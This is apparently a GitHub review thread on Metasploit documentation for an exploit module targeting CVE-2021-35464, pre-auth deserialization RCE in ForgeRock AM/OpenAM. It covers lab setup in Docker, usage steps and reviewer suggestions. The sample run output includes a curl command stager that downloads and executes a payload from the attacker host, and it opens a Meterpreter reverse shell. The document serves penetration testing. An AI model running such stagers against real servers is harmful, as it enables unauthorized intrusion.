Add module for CVE-2021-35464; pre-auth RCE in ForgeRock AM (and OpenAM) server (#15386)
rapid7/metasploit-framework: documentation/modules/exploit/multi/http/cve_2021_35464_forgerock_openam.md

## Vulnerable Application

### Description

This module leverages a pre-authentication remote code execution vulnerability
in ForgeRock’s AM identity and access management solution. The vulnerability
arises from a Java deserialization flaw in AM’s implementation of the JATO
framework and can be triggered by a simple one-line GET or POST request to a
vulnerable endpoint. Successful exploitation yields code execution on the
target system.

### Installation

> #### Ubuntu 20.04.2x64 with Docker version 20.10.2

Reviewer: ```suggestion
#### Ubuntu 20.04.2 x64 with Docker version 20.10.2
```

```
sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam

> Navigate to http://<ip_address>:7080/opanam

Reviewer: ```suggestion
Navigate to http://<ip_address>:7080/openam
```

Follow manual configuration steps.  Automatic appears to fail
Default values are good for everything except ports.  Use the following values:
DIRECTORY_ADMIN_PORT = 4444
DIRECTORY_JMX_PORT = 1689
DIRECTORY_PORT = 50389
```

## Verification Steps
1. OpenAM
1. Perform manual configuration of OpenAM
1. Do: `use exploit/multi/http/multi/http/cve_2021_35464_forgerock_openam`
1. Do: `set RHOST <ip>`
1. Do: `set LHOST <ip>`
1. Do: `set LPORT <port>`
1. Do: `run`
1. You should get a Meterpreter session.

## Scenarios

> #### Ubuntu 20.04.2x64 with Docker version 20.10.2

Reviewer: ```suggestion
#### Ubuntu 20.04.2 x64 with Docker version 20.10.2
```

## Vulnerable Application

### Description

This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access
management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato
framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful
exploitation yields code execution on the target system.

This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
is susceptible to the same issue.
### Installation

> 

Reviewer: ```suggestion
```

[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/Zrrhm8JKIL8QB2Q
[*] Local IP: http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q
[*] Generated command stager: ["curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP"]
[+] Successfully executed command: curl -so /tmp/wMKsYYMP http://192.168.135.197:8080/Zrrhm8JKIL8QB2Q;chmod +x /tmp/wMKsYYMP;/tmp/wMKsYYMP;rm -f /tmp/wMKsYYMP
[*] Client 192.168.134.134 (curl/7.64.0) requested /Zrrhm8JKIL8QB2Q
[*] Sending payload to 192.168.134.134 (curl/7.64.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.134
[*] Command Stager progress - 100.00% done (123/123 bytes)
[*] Meterpreter session 11 opened (192.168.135.197:8443 -> 192.168.134.134:44944) at 2021-07-02 15:59:30 -0500
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 10.9 (Linux 5.8.0-53-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
meterpreter > 

> 

Reviewer: ```suggestion
```

## Vulnerable Application

### Description

This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access
management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato
framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful
exploitation yields code execution on the target system.

This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
is susceptible to the same issue.

### Installation

#### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2

*This maps TCP port 7080 to the containers port 8080.*

> 1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam`

Reviewer 2: Won't this end up pulling down the latest OpenAM vs the vulnerable one?

```
 ~/git/metasploit-framework │ add_openam_deserialization *4 ?25  sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam
[sudo] password for gwillcox: 
Unable to find image 'openidentityplatform/openam:latest' locally
latest: Pulling from openidentityplatform/openam
```

Reviewer 2: Fixed with Spencer's commit at https://github.com/rapid7/metasploit-framework/pull/15386/commits/fba838f4e89200a32f23465aacc823dd3938f91a

1. Navigate to http://<ip_address>:7080/openam

> 1. Follow the manual configuration steps. Automatic configuration appears to fail.

Reviewer 2: ```suggestion
1. Click `Create New Configuration`, not `Create Default Configuration, as automatic configuration appears to fail.
```

1. Except where otherwise noted, use the default configuration values and set password fields where required.
    1. In Step 3, set the ports to the following values
        * DIRECTORY_ADMIN_PORT = 4444
        * DIRECTORY_JMX_PORT = 1689
        * DIRECTORY_PORT = 389
    1. In Step 4, select "OpenAM User Data Store"

#### ForgeRock with Docker

*This assumes that the ForgeRock `AM-6.5.3.war` file is available for deployment.*

1. Rename or copy `AM-6.5.3.war` to `openam.war`
1. In the same directory as the `openam.war` file, create a `Dockerfile` with the following contents:

    ```
    FROM tomcat:8.5.3-jre8
    
    MAINTAINER metasploit
    
    COPY openam.war /usr/local/tomcat/webapps/
    ```

1. Build the docker image using `docker build . -t forgerock`
1. Run the container using `docker container run -it --publish 8080:8080 forgerock`
1. Navigate to http://<ip_address>:8080/openam
1. Follow the default configuration steps.

## Verification Steps

1. OpenAM

> 1. Perform manual configuration of OpenAM

Reviewer 2: ```suggestion
1. Follow the OpenAM instructions listed above to install OpenAM
1. Follow the `ForgeRock with Docker` instructions above to install ForgeRock.
```

> 1. Do: `use exploit/multi/http/multi/http/cve_2021_35464_forgerock_openam`

Reviewer 2: ```suggestion
1. Do: `use exploit/multi/http/cve_2021_35464_forgerock_openam`
```

1. Do: `set RHOST <ip>`
1. Do: `set LHOST <ip>`
1. Do: `set LPORT <port>`
1. Do: `run`
1. You should get a Meterpreter session.

## Scenarios

> #### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2

Reviewer 2: Updating documentation shortly to account for this and other scenario related details.

> #### OpenAM on Ubuntu 20.04.2 x64 with Docker version 20.10.2

Reviewer 2: Resolved in https://github.com/rapid7/metasploit-framework/pull/15386/commits/5c8aa9b802db0d1a9aa393a5d9a321c4d5ae89ee
